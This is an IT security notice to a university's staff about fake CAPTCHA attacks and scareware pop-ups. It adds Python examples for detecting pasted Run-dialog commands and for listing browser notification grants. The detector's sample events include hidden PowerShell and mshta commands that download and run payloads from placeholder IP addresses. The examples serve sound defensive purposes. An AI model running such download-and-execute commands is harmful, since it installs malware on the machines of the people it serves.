As cyber threats continue to evolve, we want to bring to your attention some significant changes in attack methods and provide guidance on how best to protect yourself and BU.
Fake CAPTCHA authentications
What is a CAPTCHA?
Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a type of challenge-response test (usually a tick box) used to determine whether a user is human or not.
What is the attack?
The attack starts when a user visits a compromised website. A fake CAPTCHA appears and asks the user to prove they are human by completing a task. A genuine CAPTCHA normally asks you to tick a box or select images containing a particular item; this one instead gives the user a series of key combinations to type on their keyboard as "verification steps".
Those key combinations are keyboard shortcuts. When the user interacts with the fake CAPTCHA, the page silently copies a malicious command to the clipboard; the shortcuts then open a run dialog or command prompt, paste that command and execute it. Behind the CAPTCHA the page shows only a background image, so the command itself is never displayed and the user has no indication of what has been run. The command downloads and runs a malicious file from the internet, installing malware (malicious software) on the user's device.
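For IT and security staff, the useful detection point in the attack described above is the moment the pasted command runs: a command interpreter launched from the Run dialog (whose parent process is explorer.exe) with a command line that fetches and executes something from the internet, often with a hidden window or an execution-policy bypass. The following is an added example, not part of this notice or any BU tooling. It runs that check over a few constructed process-creation records in a tab-separated parent/image/command-line format; the field layout and the interpreter and parent lists are assumptions to be mapped onto whatever your EDR or Sysmon export actually produces.

```python
"""Added example: flag process-creation events matching the fake-CAPTCHA pattern
(a pasted shortcut sequence launches an interpreter that downloads and runs a payload).

The event lines are constructed for this example. The tab-separated layout
(parent image cmdline) and the name lists below are assumptions; adapt them to
your own telemetry."""
import re

# Interpreters a pasted Run-dialog command usually lands in (assumption; extend as needed).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# The Run dialog and desktop shortcuts are hosted by explorer.exe on Windows.
SHORTCUT_PARENTS = {"explorer.exe"}

# Command-line indicators that remote content is being fetched or executed.
FETCH_RE = re.compile(
    r"(https?://|Invoke-WebRequest|\biwr\b|\bcurl\b|Net\.WebClient|DownloadString"
    r"|Invoke-Expression|\biex\b)", re.I)
# Indicators that the command is trying to hide itself or bypass controls.
OBFUSCATION_RE = re.compile(
    r"(-enc(odedcommand)?\s|-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass"
    r"|-executionpolicy\s+bypass)", re.I)

# Constructed sample events: parent \t image \t cmdline
SAMPLE_EVENTS = [
    # benign: user opens PowerShell from the Start menu
    "explorer.exe\tpowershell.exe\tpowershell.exe",
    # fake-CAPTCHA style: hidden window, policy bypass, download-and-execute
    "explorer.exe\tpowershell.exe\tpowershell -w hidden -ep bypass -c "
    "\"iex (iwr http://203.0.113.10/verify.txt)\"",
    # fake-CAPTCHA style: mshta pulling a remote HTA
    "explorer.exe\tmshta.exe\tmshta http://198.51.100.7/captcha.hta",
    # benign: scheduled task running an admin script that references a URL
    "svchost.exe\tpowershell.exe\tpowershell -File C:\\Scripts\\patch.ps1 "
    "-Source https://updates.example.edu",
    # benign: browser child process, not an interpreter
    "chrome.exe\tchrome.exe\tchrome.exe --type=renderer",
]


def classify(parent, image, cmdline):
    """Return the list of reasons an event looks like a pasted download-and-run.

    An empty list means the event does not match: either the image is not an
    interpreter, it was not launched from a shortcut/Run-dialog parent, or the
    command line carries no fetch or obfuscation indicator."""
    if image.lower() not in INTERPRETERS or parent.lower() not in SHORTCUT_PARENTS:
        return []
    reasons = []
    if FETCH_RE.search(cmdline):
        reasons.append("command fetches or executes remote content")
    if OBFUSCATION_RE.search(cmdline):
        reasons.append("hidden window, policy bypass or encoded command")
    return reasons


def detect(lines):
    """Parse tab-separated events and return an alert dict for each match."""
    alerts = []
    for line in lines:
        parent, image, cmdline = line.split("\t", 2)
        reasons = classify(parent, image, cmdline)
        if reasons:
            alerts.append({"parent": parent, "image": image,
                           "cmdline": cmdline, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"ALERT {alert['parent']} -> {alert['image']}: {alert['cmdline']}")
        for reason in alert["reasons"]:
            print(f"    - {reason}")
```

The parent-process condition is what keeps this from firing on every administrative script that happens to contain a URL: a scheduled task or management agent does not run under explorer.exe, while a command typed into the Run dialog always does.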
How to stay safe?
If you come across a CAPTCHA that asks you to copy and paste a command into your computer, or to type a sequence of keyboard shortcuts, do not do this under any circumstances and stop interacting with the webpage. No genuine CAPTCHA check asks you to run a command. It is a tactic used by cyber-criminals to gain access to your personal, financial and/or sensitive information. If you come across a CAPTCHA check like this, please report it to the IT Service Desk immediately.
Malicious pop-ups
Malicious pop-ups are deceptive notification messages that can appear on your desktop when browsing compromised websites. They use scare tactics to pressure a user into clicking or otherwise interacting with the pop-up. Common pop-ups impersonate urgent alerts from well-known computer security companies such as McAfee and Norton, stating that viruses have been detected on the device or that a malicious connection has been made to it, with 'buttons' encouraging the user to click to remove the threats.
Unfortunately, despite these pop-ups becoming more common, staff often choose not to report them for investigation. This needs to change.
What is the attack?
When browsing compromised websites, the user is asked to grant the website permission to carry out certain actions in the browser. We are used to granting our browser access to the camera and microphone for platforms like Zoom and Teams, and compromised sites abuse this familiarity to request permission to display pop-ups and notifications, redirect the browser and run scripts from the site.
Once these permissions have been granted, notifications can be pushed to the computer even after the site has been closed, and the browser can be redirected to malicious sites. The malicious pop-ups are the first step of an attack: if a pop-up is clicked, it can download and run malware on your device.
Malware can spread throughout the BU network placing all our data at risk of theft, ransom and sabotage.
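Because the pop-ups described above are delivered through a notification permission the user granted, the first triage question for whoever investigates a report is which website was given that permission, and when. The following is an added example, not part of this notice or any BU tooling. It lists the sites a Chromium-based browser (Chrome or Edge) has been allowed to send notifications from, reading the profile's Preferences JSON. The embedded JSON is constructed for the example; it follows the Preferences layout as understood here (profile.content_settings.exceptions.notifications, with setting 1 meaning allow and 2 meaning block, and last_modified as microseconds since 1601-01-01), which should be checked against a real profile before relying on it. The list of expected sites is also an assumption.

```python
"""Added example: list which websites a Chromium-based browser may send notifications
from, so a responder can tell where scareware pop-ups came from.

SAMPLE_PREFERENCES is constructed. Its layout and the meaning of the 'setting' and
'last_modified' fields are assumptions about Chromium's Preferences file; verify
against a real profile. Typical profile paths on Windows (assumption):
  %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Preferences
  %LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Preferences"""
import json
from datetime import datetime, timedelta, timezone

# Sites the organisation expects to see with notification permission (assumption).
EXPECTED_ORIGINS = {"https://teams.microsoft.com:443", "https://zoom.us:443"}

# Constructed sample of the relevant part of a Preferences file.
SAMPLE_PREFERENCES = json.dumps({
    "profile": {
        "content_settings": {
            "exceptions": {
                "notifications": {
                    "https://teams.microsoft.com:443,*":
                        {"last_modified": "13340000000000000", "setting": 1},
                    "https://zoom.us:443,*":
                        {"last_modified": "13345000000000000", "setting": 1},
                    "https://secure-virus-alert.example:443,*":
                        {"last_modified": "13350000000000000", "setting": 1},
                    "https://news.example:443,*":
                        {"last_modified": "13349000000000000", "setting": 2},
                },
                # Other permission types live alongside and are ignored here.
                "media_stream_camera": {
                    "https://teams.microsoft.com:443,*": {"setting": 1},
                },
            }
        }
    }
})


def chromium_time(micros):
    """Convert a Chromium timestamp (microseconds since 1601-01-01 UTC) to a datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=int(micros))


def notification_grants(prefs_json):
    """Return the origins allowed to send notifications, oldest grant first."""
    prefs = json.loads(prefs_json)
    exceptions = (prefs.get("profile", {}).get("content_settings", {})
                  .get("exceptions", {}).get("notifications", {}))
    grants = []
    for pattern, entry in exceptions.items():
        if entry.get("setting") != 1:          # 1 = allow; 2 = block (assumption)
            continue
        origin = pattern.split(",", 1)[0]       # "https://host:443,*" -> "https://host:443"
        when = entry.get("last_modified")
        grants.append({
            "origin": origin,
            "granted_at": chromium_time(when).isoformat() if when else None,
        })
    grants.sort(key=lambda g: g["granted_at"] or "")
    return grants


def unexpected_grants(prefs_json, expected_origins):
    """Grants for origins not on the expected list: the likely source of the pop-ups."""
    return [g for g in notification_grants(prefs_json) if g["origin"] not in expected_origins]


def load_preferences(path):
    """Read a real Preferences file (the browser should be closed while you read it)."""
    with open(path, encoding="utf-8") as fh:
        return fh.read()


if __name__ == "__main__":
    for grant in unexpected_grants(SAMPLE_PREFERENCES, EXPECTED_ORIGINS):
        print(f"unexpected notification grant: {grant['origin']} at {grant['granted_at']}")
```

The grant time is the detail worth keeping alongside the screenshot the notice asks for: it places the moment the user clicked "Allow" on the timeline, which can be matched against proxy or DNS logs to find the compromised page that prompted it.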
How to stay safe if you encounter a pop-up:
- Do not click on the pop-up
- Do not call any phone number shown in the pop-up
- Do not give out personal details or payment details
- Either take photos of the pop-ups or leave them on screen, and call the IT Service Desk immediately. The pop-ups contain information that can be used to protect BU staff and devices from further attack.
Most importantly, report this to the IT Service Desk.
Report, report, report! Information security is everyone’s responsibility, and we’d prefer you to report something you are unsure of for investigation rather than choosing to do nothing at all.
Report non-urgent security incidents or concerns via the IT Self Service Portal. For urgent matters including data breach, account compromise, or computer virus call (01202 9)65515 or freephone 0808 196 2332.